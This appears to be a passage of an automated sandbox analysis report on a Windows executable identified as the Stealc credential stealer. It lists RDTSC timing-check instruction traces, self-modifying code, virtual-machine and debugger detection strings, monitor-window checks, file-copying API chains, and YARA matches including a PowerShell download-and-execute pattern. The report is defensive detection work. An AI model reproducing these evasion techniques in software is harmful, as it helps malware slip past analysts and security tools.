                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC2989 second address: AC299C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC299C second address: AC29B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82118h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC29B8 second address: AC29EB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4C68E58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FA3D4C68E63h 0x00000014 popad 0x00000015 jno 00007FA3D4C68E5Eh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC29EB second address: AC29F5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA3D4D8210Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC8AA0 second address: AC8AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC8AA6 second address: AC8AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC8BDF second address: AC8C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e popad 0x0000000f jne 00007FA3D4C68E8Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA3D4C68E65h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: ACB080 second address: ACB099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA3D4D82114h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AD8A20 second address: AD8A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AD8A25 second address: AD8A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AD8A2D second address: AD8A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AD8577 second address: AD857C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AD857C second address: AD85DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jmp 00007FA3D4C68E5Fh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007FA3D4C68E65h 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c pop eax 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jmp 00007FA3D4C68E5Ah 0x00000025 jno 00007FA3D4C68E56h 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 jmp 00007FA3D4C68E5Eh 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: ADCA34 second address: ADCA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FA3D4D8210Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: ADCA45 second address: ADCA62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4C68E68h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AE146C second address: AE1472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AEB47B second address: AEB4B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Fh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007FA3D4C68E56h 0x00000012 jmp 00007FA3D4C68E68h 0x00000017 push edx 0x00000018 pop edx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AEF408 second address: AEF412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF446D second address: AF4471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF4471 second address: AF4481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3D4D8210Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF4481 second address: AF44B5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA3D4C68E5Eh 0x00000008 jmp 00007FA3D4C68E5Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FA3D4C68E5Bh 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF4737 second address: AF474C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA3D4D8210Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF474C second address: AF4770 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA3D4C68E6Ah 0x00000008 jne 00007FA3D4C68E56h 0x0000000e jmp 00007FA3D4C68E5Eh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF4770 second address: AF4784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA3D4D82106h 0x0000000a js 00007FA3D4D82106h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF4784 second address: AF478A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF4918 second address: AF491D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF491D second address: AF4923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF94B5 second address: AF94BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF922E second address: AF9232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AF9232 second address: AF923A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B0BB9A second address: B0BB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B18EC1 second address: B18ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA3D4D82106h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B1AA69 second address: B1AA6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B1AA6D second address: B1AA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B1DEB5 second address: B1DEBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B1DCED second address: B1DCF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B1DCF1 second address: B1DCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B1DCFF second address: B1DD1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA3D4D82110h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jc 00007FA3D4D82106h 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B2BB66 second address: B2BB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA3D4C68E56h 0x0000000a popad 0x0000000b jmp 00007FA3D4C68E5Bh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B2BE1D second address: B2BE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B2C1CF second address: B2C1D9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA3D4C68E56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B2C1D9 second address: B2C1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA3D4D82108h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA3D4D8210Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B2C1F6 second address: B2C1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B3077C second address: B30782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B30824 second address: B3082A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B30A16 second address: B30A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 or dh, FFFFFF8Fh 0x0000000b push 00000004h 0x0000000d mov dh, F1h 0x0000000f jl 00007FA3D4D8210Ch 0x00000015 push BE6C793Fh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007FA3D4D8210Ch 0x00000022 jc 00007FA3D4D82106h 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B30A4C second address: B30A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: B30CBC second address: B30CCA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: 519021E second address: 5190247 instructions: 0x00000000 rdtsc 0x00000002 call 00007FA3D4C68E5Ah 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007FA3D4C68E5Bh 0x0000000f mov ch, 77h 0x00000011 pop edi 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ax, di 0x0000001a movsx ebx, cx 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: 5190247 second address: 519027C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA3D4D82119h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop esi 0x00000015 mov edi, 5F0F215Ah 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: 51902EC second address: 5190322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA3D4C68E66h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA3D4C68E5Ah 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: 5190322 second address: 5190331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: 5190331 second address: 5190345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov bx, 0806h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: 5190345 second address: 519034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSpecial instruction interceptor: First address: 8A199E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSpecial instruction interceptor: First address: 8A1998 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSpecial instruction interceptor: First address: AD06B7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_006538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006538B0
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00654910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00654910
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_0064DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0064DA80
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_0064E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0064E430
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00654570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00654570
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_0064ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0064ED20
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_0064BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0064BE70
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_0064DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0064DE10
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_006416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006416D0
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00653EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00653EA0
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_0064F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0064F6B0
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00641160 GetSystemInfo,ExitProcess,0_2_00641160
                Source: XDPT5mgIBO.exe, XDPT5mgIBO.exe, 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware=
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001434000.00000004.00000020.00020000.00000000.sdmp, XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001406000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeAPI call chain: ExitProcess graph end nodegraph_0-13577
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeAPI call chain: ExitProcess graph end nodegraph_0-13580
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeAPI call chain: ExitProcess graph end nodegraph_0-13599
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeAPI call chain: ExitProcess graph end nodegraph_0-13631
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeAPI call chain: ExitProcess graph end nodegraph_0-13591
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeFile opened: SICE
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_006445C0 VirtualProtect ?,00000004,00000100,000000000_2_006445C0
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00659860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00659860
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00659750 mov eax, dword ptr fs:[00000030h]0_2_00659750
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00657850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00657850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: XDPT5mgIBO.exe PID: 5928, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00659600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00659600
                Source: XDPT5mgIBO.exe, XDPT5mgIBO.exe, 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: (Program Manager
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00657B90
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00656920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00656920
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00657850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00657850
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00657A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00657A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.XDPT5mgIBO.exe.640000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: XDPT5mgIBO.exe PID: 5928, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.XDPT5mgIBO.exe.640000.0.unpack, type: UNPACKEDPE
